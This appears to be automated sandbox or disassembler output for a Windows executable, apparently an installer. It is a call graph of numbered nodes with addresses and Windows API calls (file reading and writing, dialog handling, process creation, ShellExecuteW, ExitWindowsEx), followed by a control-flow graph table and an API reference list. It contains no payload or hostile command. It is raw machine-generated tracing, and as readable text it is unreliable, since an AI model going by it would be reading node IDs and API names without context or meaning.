3853->3858 3854->3849 3855 403336 ReadFile 3855->3856 3856->3849 3856->3855 3860 40348a GetTickCount 3856->3860 3861 4034af MulDiv wsprintfW 3856->3861 3863 4034f3 WriteFile 3856->3863 3857->3853 3858->3849 3859 4035a1 3858->3859 3859->3849 3859->3853 3860->3856 3862 404f9e 25 API calls 3861->3862 3862->3856 3863->3849 3863->3856 3864->3800 3865->3799 3867 401a75 lstrcatW 3866->3867 3868 40676b lstrcatW 3866->3868 3867->3800 3868->3867 3870 405e79 3869->3870 3871 405e6b SetFileAttributesW 3869->3871 3870->3834 3871->3870 3873 405ce1 3872->3873 3874 405d2f 3873->3874 3875 405cf7 MessageBoxIndirectW 3873->3875 3874->3834 3875->3874 3877 403357 3876->3877 3877->3849 3877->3850 3877->3851 3878->3845 4831 40209f GetDlgItem GetClientRect 4832 40145c 18 API calls 4831->4832 4833 4020cf LoadImageW SendMessageW 4832->4833 4834 4030e3 4833->4834 4835 4020ed DeleteObject 4833->4835 4835->4834 4836 402b9f 4837 401446 18 API calls 4836->4837 4841 402ba7 4837->4841 4838 402c4a 4839 402bdf ReadFile 4839->4841 4848 402c3d 4839->4848 4840 401446 18 API calls 4840->4848 4841->4838 4841->4839 4842 402c06 MultiByteToWideChar 4841->4842 4843 402c3f 4841->4843 4844 402c4f 4841->4844 4841->4848 4842->4841 4842->4844 4849 405f7d wsprintfW 4843->4849 4846 402c6b SetFilePointer 4844->4846 4844->4848 4846->4848 4847 402d17 ReadFile 4847->4848 4848->4838 4848->4840 4848->4847 4849->4838 4850 402b23 GlobalAlloc 4851 402b39 4850->4851 4852 402b4b 4850->4852 4853 401446 18 API calls 4851->4853 4854 40145c 18 API calls 4852->4854 4856 402b41 4853->4856 4855 402b52 WideCharToMultiByte lstrlenA 4854->4855 4855->4856 4857 402b84 WriteFile 4856->4857 4858 402b93 4856->4858 4857->4858 4859 402384 GlobalFree 4857->4859 4859->4858 4861 4040a3 4862 4040b0 lstrcpynW lstrlenW 4861->4862 4863 4040ad 4861->4863 4863->4862 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4864 402da5 4865 4030e3 4864->4865 4866 402dac 4864->4866 4867 401446 18 API calls 4866->4867 4868 402db8 4867->4868 4869 402dbf SetFilePointer 4868->4869 4869->4865 4870 402dcf 4869->4870 4870->4865 4872 405f7d wsprintfW 4870->4872 4872->4865 4873 4049a8 GetDlgItem GetDlgItem 4874 4049fe 7 API calls 4873->4874 4879 404c16 4873->4879 4875 404aa2 DeleteObject 4874->4875 4876 404a96 SendMessageW 4874->4876 4877 404aad 4875->4877 4876->4875 4880 404ae4 4877->4880 4883 406831 18 API calls 4877->4883 4878 404cfb 4881 404da0 4878->4881 4882 404c09 4878->4882 4887 404d4a SendMessageW 4878->4887 4879->4878 4891 40487a 5 API calls 4879->4891 4904 404c86 4879->4904 4886 403d6b 19 API calls 4880->4886 4884 404db5 4881->4884 4885 404da9 SendMessageW 4881->4885 4888 403df6 8 API calls 4882->4888 4889 404ac6 SendMessageW SendMessageW 4883->4889 4896 404dc7 ImageList_Destroy 4884->4896 4897 404dce 4884->4897 4902 404dde 4884->4902 4885->4884 4892 404af8 4886->4892 4887->4882 4894 404d5f SendMessageW 4887->4894 4895 404f97 4888->4895 4889->4877 4890 404ced SendMessageW 4890->4878 4891->4904 4898 403d6b 19 API calls 4892->4898 4893 404f48 4893->4882 4903 404f5d ShowWindow GetDlgItem ShowWindow 4893->4903 4899 404d72 4894->4899 4896->4897 4900 404dd7 GlobalFree 4897->4900 4897->4902 4906 404b09 4898->4906 4908 404d83 SendMessageW 4899->4908 4900->4902 4901 404bd6 GetWindowLongW SetWindowLongW 4905 404bf0 4901->4905 4902->4893 4907 40141d 80 API calls 4902->4907 4917 404e10 4902->4917 4903->4882 4904->4878 4904->4890 4909 404bf6 ShowWindow 4905->4909 4910 404c0e 4905->4910 4906->4901 4912 404b65 SendMessageW 4906->4912 4913 404bd0 4906->4913 4915 404b93 SendMessageW 4906->4915 4916 404ba7 SendMessageW 4906->4916 4907->4917 4908->4881 4924 403dc4 SendMessageW 4909->4924 4925 403dc4 SendMessageW 4910->4925 4912->4906 4913->4901 4913->4905 4915->4906 4916->4906 4918 404e54 4917->4918 4921 404e3e SendMessageW 4917->4921 4919 404f1f InvalidateRect 4918->4919 4923 404ecd SendMessageW SendMessageW 4918->4923 4919->4893 4920 404f35 4919->4920 4922 4043d9 21 API calls 4920->4922 4921->4918 4922->4893 4923->4918 4924->4882 4925->4879 4926 4030a9 SendMessageW 4927 4030c2 InvalidateRect 4926->4927 4928 4030e3 4926->4928 4927->4928 3879 4038af #17 SetErrorMode OleInitialize 3880 406328 3 API calls 3879->3880 3881 4038f2 SHGetFileInfoW 3880->3881 3953 406035 lstrcpynW 3881->3953 3883 40391d GetCommandLineW 3954 406035 lstrcpynW 3883->3954 3885 40392f GetModuleHandleW 3886 403947 3885->3886 3887 405d32 CharNextW 3886->3887 3888 403956 CharNextW 3887->3888 3899 403968 3888->3899 3889 403a02 3890 403a21 GetTempPathW 3889->3890 3955 4037f8 3890->3955 3892 403a37 3894 403a3b GetWindowsDirectoryW lstrcatW 3892->3894 3895 403a5f DeleteFileW 3892->3895 3893 405d32 CharNextW 3893->3899 3897 4037f8 11 API calls 3894->3897 3963 4035b3 GetTickCount GetModuleFileNameW 3895->3963 3900 403a57 3897->3900 3898 403a73 3901 403af8 3898->3901 3903 405d32 CharNextW 3898->3903 3939 403add 3898->3939 3899->3889 3899->3893 3906 403a04 3899->3906 3900->3895 3900->3901 4048 403885 3901->4048 3907 403a8a 3903->3907 4055 406035 lstrcpynW 3906->4055 3918 403b23 lstrcatW lstrcmpiW 3907->3918 3919 403ab5 3907->3919 3908 403aed 3911 406113 9 API calls 3908->3911 3909 403bfa 3912 403c7d 3909->3912 3914 406328 3 API calls 3909->3914 3910 403b0d 3913 405ccc MessageBoxIndirectW 3910->3913 3911->3901 3915 403b1b ExitProcess 3913->3915 3917 403c09 3914->3917 3921 406328 3 API calls 3917->3921 3918->3901 3920 403b3f CreateDirectoryW SetCurrentDirectoryW 3918->3920 4056 4067aa 3919->4056 3923 403b62 3920->3923 3924 403b57 3920->3924 3925 403c12 3921->3925 4073 406035 lstrcpynW 3923->4073 4072 406035 lstrcpynW 3924->4072 3929 406328 3 API calls 3925->3929 3932 403c1b 3929->3932 3931 403b70 4074 406035 lstrcpynW 3931->4074 3933 403c69 ExitWindowsEx 3932->3933 3938 403c29 GetCurrentProcess 3932->3938 3933->3912 3937 403c76 3933->3937 3934 403ad2 4071 406035 lstrcpynW 3934->4071 3940 40141d 80 API calls 3937->3940 3942 403c39 3938->3942 3991 405958 3939->3991 3940->3912 3941 406831 18 API calls 3943 403b98 DeleteFileW 3941->3943 3942->3933 3944 403ba5 CopyFileW 3943->3944 3950 403b7f 3943->3950 3944->3950 3945 403bee 3946 406c94 42 API calls 3945->3946 3948 403bf5 3946->3948 3947 406c94 42 API calls 3947->3950 3948->3901 3949 406831 18 API calls 3949->3950 3950->3941 3950->3945 3950->3947 3950->3949 3952 403bd9 CloseHandle 3950->3952 4075 405c6b CreateProcessW 3950->4075 3952->3950 3953->3883 3954->3885 3956 406064 5 API calls 3955->3956 3957 403804 3956->3957 3958 40380e 3957->3958 3959 40674e 3 API calls 3957->3959 3958->3892 3960 403816 CreateDirectoryW 3959->3960 3961 405eab 2 API calls 3960->3961 3962 40382a 3961->3962 3962->3892 4078 405e7c GetFileAttributesW CreateFileW 3963->4078 3965 4035f3 3985 403603 3965->3985 4079 406035 lstrcpynW 3965->4079 3967 403619 4080 40677d lstrlenW 3967->4080 3971 40362a GetFileSize 3972 403726 3971->3972 3986 403641 3971->3986 4085 4032d2 3972->4085 3974 40372f 3976 40376b GlobalAlloc 3974->3976 3974->3985 4097 403368 SetFilePointer 3974->4097 3975 403336 ReadFile 3975->3986 4096 403368 SetFilePointer 3976->4096 3979 4037e9 3982 4032d2 6 API calls 3979->3982 3980 403786 3983 40337f 33 API calls 3980->3983 3981 40374c 3984 403336 ReadFile 3981->3984 3982->3985 3989 403792 3983->3989 3988 403757 3984->3988 3985->3898 3986->3972 3986->3975 3986->3979 3986->3985 3987 4032d2 6 API calls 3986->3987 3987->3986 3988->3976 3988->3985 3989->3985 3989->3989 3990 4037c0 SetFilePointer 3989->3990 3990->3985 3992 406328 3 API calls 3991->3992 3993 40596c 3992->3993 3994 405972 3993->3994 3995 405984 3993->3995 4111 405f7d wsprintfW 3994->4111 3996 405eff 3 API calls 3995->3996 3997 4059b5 3996->3997 3999 4059d4 lstrcatW 3997->3999 4001 405eff 3 API calls 3997->4001 4000 405982 3999->4000 4102 403ec1 4000->4102 4001->3999 4004 4067aa 18 API calls 4005 405a06 4004->4005 4006 405a9c 4005->4006 4008 405eff 3 API calls 4005->4008 4007 4067aa 18 API calls 4006->4007 4009 405aa2 4007->4009 4010 405a38 4008->4010 4011 405ab2 4009->4011 4012 406831 18 API calls 4009->4012 4010->4006 4014 405a5b lstrlenW 4010->4014 4017 405d32 CharNextW 4010->4017 4013 405ad2 LoadImageW 4011->4013 4113 403ea0 4011->4113 4012->4011 4015 405b92 4013->4015 4016 405afd RegisterClassW 4013->4016 4018 405a69 lstrcmpiW 4014->4018 4019 405a8f 4014->4019 4023 40141d 80 API calls 4015->4023 4021 405b9c 4016->4021 4022 405b45 SystemParametersInfoW CreateWindowExW 4016->4022 4024 405a56 4017->4024 4018->4019 4025 405a79 GetFileAttributesW 4018->4025 4027 40674e 3 API calls 4019->4027 4021->3908 4022->4015 4028 405b98 4023->4028 4024->4014 4029 405a85 4025->4029 4026 405ac8 4026->4013 4030 405a95 4027->4030 4028->4021 4031 403ec1 19 API calls 4028->4031 4029->4019 4032 40677d 2 API calls 4029->4032 4112 406035 lstrcpynW 4030->4112 4034 405ba9 4031->4034 4032->4019 4035 405bb5 ShowWindow LoadLibraryW 4034->4035 4036 405c38 4034->4036 4037 405bd4 LoadLibraryW 4035->4037 4038 405bdb GetClassInfoW 4035->4038 4039 405073 83 API calls 4036->4039 4037->4038 4040 405c05 DialogBoxParamW 4038->4040 4041 405bef GetClassInfoW RegisterClassW 4038->4041 4042 405c3e 4039->4042 4045 40141d 80 API calls 4040->4045 4041->4040 4043 405c42 4042->4043 4044 405c5a 4042->4044 4043->4021 4047 40141d 80 API calls 4043->4047 4046 40141d 80 API calls 4044->4046 4045->4021 4046->4021 4047->4021 4049 40389d 4048->4049 4050 40388f CloseHandle 4048->4050 4120 403caf 4049->4120 4050->4049 4055->3890 4173 406035 lstrcpynW 4056->4173 4058 4067bb 4059 405d85 4 API calls 4058->4059 4060 4067c1 4059->4060 4061 406064 5 API calls 4060->4061 4068 403ac3 4060->4068 4064 4067d1 4061->4064 4062 406809 lstrlenW 4063 406810 4062->4063 4062->4064 4066 40674e 3 API calls 4063->4066 4064->4062 4065 406301 2 API calls 4064->4065 4064->4068 4069 40677d 2 API calls 4064->4069 4065->4064 4067 406816 GetFileAttributesW 4066->4067 4067->4068 4068->3901 4070 406035 lstrcpynW 4068->4070 4069->4062 4070->3934 4071->3939 4072->3923 4073->3931 4074->3950 4076 405ca6 4075->4076 4077 405c9a CloseHandle 4075->4077 4076->3950 4077->4076 4078->3965 4079->3967 4081 40678c 4080->4081 4082 406792 CharPrevW 4081->4082 4083 40361f 4081->4083 4082->4081 4082->4083 4084 406035 lstrcpynW 4083->4084 4084->3971 4086 4032f3 4085->4086 4087 4032db 4085->4087 4090 403303 GetTickCount 4086->4090 4091 4032fb 4086->4091 4088 4032e4 DestroyWindow 4087->4088 4089 4032eb 4087->4089 4088->4089 4089->3974 4093 403311 CreateDialogParamW ShowWindow 4090->4093 4094 403334 4090->4094 4098 40635e 4091->4098 4093->4094 4094->3974 4096->3980 4097->3981 4099 40637b PeekMessageW 4098->4099 4100 406371 DispatchMessageW 4099->4100 4101 403301 4099->4101 4100->4099 4101->3974 4103 403ed5 4102->4103 4118 405f7d wsprintfW 4103->4118 4105 403f49 4106 406831 18 API calls 4105->4106 4107 403f55 SetWindowTextW 4106->4107 4108 403f70 4107->4108 4109 403f8b 4108->4109 4110 406831 18 API calls 4108->4110 4109->4004 4110->4108 4111->4000 4112->4006 4119 406035 lstrcpynW 4113->4119 4115 403eb4 4116 40674e 3 API calls 4115->4116 4117 403eba lstrcatW 4116->4117 4117->4026 4118->4105 4119->4115 4121 403cbd 4120->4121 4122 4038a2 4121->4122 4123 403cc2 FreeLibrary GlobalFree 4121->4123 4124 406cc7 4122->4124 4123->4122 4123->4123 4125 4067aa 18 API calls 4124->4125 4126 406cda 4125->4126 4127 406ce3 DeleteFileW 4126->4127 4128 406cfa 4126->4128 4167 4038ae CoUninitialize 4127->4167 4129 406e77 4128->4129 4171 406035 lstrcpynW 4128->4171 4135 406301 2 API calls 4129->4135 4155 406e84 4129->4155 4129->4167 4131 406d25 4132 406d39 4131->4132 4133 406d2f lstrcatW 4131->4133 4136 40677d 2 API calls 4132->4136 4134 406d3f 4133->4134 4138 406d4f lstrcatW 4134->4138 4140 406d57 lstrlenW FindFirstFileW 4134->4140 4137 406e90 4135->4137 4136->4134 4141 40674e 3 API calls 4137->4141 4137->4167 4138->4140 4139 4062cf 11 API calls 4139->4167 4144 406e67 4140->4144 4168 406d7e 4140->4168 4142 406e9a 4141->4142 4145 4062cf 11 API calls 4142->4145 4143 405d32 CharNextW 4143->4168 4144->4129 4146 406ea5 4145->4146 4147 405e5c 2 API calls 4146->4147 4148 406ead RemoveDirectoryW 4147->4148 4152 406ef0 4148->4152 4153 406eb9 4148->4153 4149 406e44 FindNextFileW 4151 406e5c FindClose 4149->4151 4149->4168 4151->4144 4154 404f9e 25 API calls 4152->4154 4153->4155 4156 406ebf 4153->4156 4154->4167 4155->4139 4158 4062cf 11 API calls 4156->4158 4157 4062cf 11 API calls 4157->4168 4159 406ec9 4158->4159 4162 404f9e 25 API calls 4159->4162 4160 406cc7 72 API calls 4160->4168 4161 405e5c 2 API calls 4163 406dfa DeleteFileW 4161->4163 4164 406ed3 4162->4164 4163->4168 4165 406c94 42 API calls 4164->4165 4165->4167 4166 404f9e 25 API calls 4166->4149 4167->3909 4167->3910 4168->4143 4168->4149 4168->4157 4168->4160 4168->4161 4168->4166 4169 404f9e 25 API calls 4168->4169 4170 406c94 42 API calls 4168->4170 4172 406035 lstrcpynW 4168->4172 4169->4168 4170->4168 4171->4131 4172->4168 4173->4058 4929 401cb2 4930 40145c 18 API calls 4929->4930 4931 401c54 4930->4931 4932 4062cf 11 API calls 4931->4932 4933 401c64 4931->4933 4934 401c59 4932->4934 4935 406cc7 81 API calls 4934->4935 4935->4933 3705 4021b5 3706 40145c 18 API calls 3705->3706 3707 4021bb 3706->3707 3708 40145c 18 API calls 3707->3708 3709 4021c4 3708->3709 3710 40145c 18 API calls 3709->3710 3711 4021cd 3710->3711 3712 40145c 18 API calls 3711->3712 3713 4021d6 3712->3713 3714 404f9e 25 API calls 3713->3714 3715 4021e2 ShellExecuteW 3714->3715 3716 40221b 3715->3716 3717 40220d 3715->3717 3718 4062cf 11 API calls 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 402230 3718->3720 3719->3716 4936 402238 4937 40145c 18 API calls 4936->4937 4938 40223e 4937->4938 4939 4062cf 11 API calls 4938->4939 4940 40224b 4939->4940 4941 404f9e 25 API calls 4940->4941 4942 402255 4941->4942 4943 405c6b 2 API calls 4942->4943 4944 40225b 4943->4944 4945 4062cf 11 API calls 4944->4945 4953 4022ac CloseHandle 4944->4953 4950 40226d 4945->4950 4947 4030e3 4948 402283 WaitForSingleObject 4949 402291 GetExitCodeProcess 4948->4949 4948->4950 4952 4022a3 4949->4952 4949->4953 4950->4948 4951 40635e 2 API calls 4950->4951 4950->4953 4951->4948 4955 405f7d wsprintfW 4952->4955 4953->4947 4955->4953 4956 404039 4957 404096 4956->4957 4958 404046 lstrcpynA lstrlenA 4956->4958 4958->4957 4959 404077 4958->4959 4959->4957 4960 404083 GlobalFree 4959->4960 4960->4957 4961 401eb9 4962 401f24 4961->4962 4965 401ec6 4961->4965 4963 401f53 GlobalAlloc 4962->4963 4967 401f28 4962->4967 4969 406831 18 API calls 4963->4969 4964 401ed5 4968 4062cf 11 API calls 4964->4968 4965->4964 4971 401ef7 4965->4971 4966 401f36 4985 406035 lstrcpynW 4966->4985 4967->4966 4970 4062cf 11 API calls 4967->4970 4980 401ee2 4968->4980 4973 401f46 4969->4973 4970->4966 4983 406035 lstrcpynW 4971->4983 4975 402708 4973->4975 4976 402387 GlobalFree 4973->4976 4976->4975 4977 401f06 4984 406035 lstrcpynW 4977->4984 4978 406831 18 API calls 4978->4980 4980->4975 4980->4978 4981 401f15 4986 406035 lstrcpynW 4981->4986 4983->4977 4984->4981 4985->4973 4986->4975

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
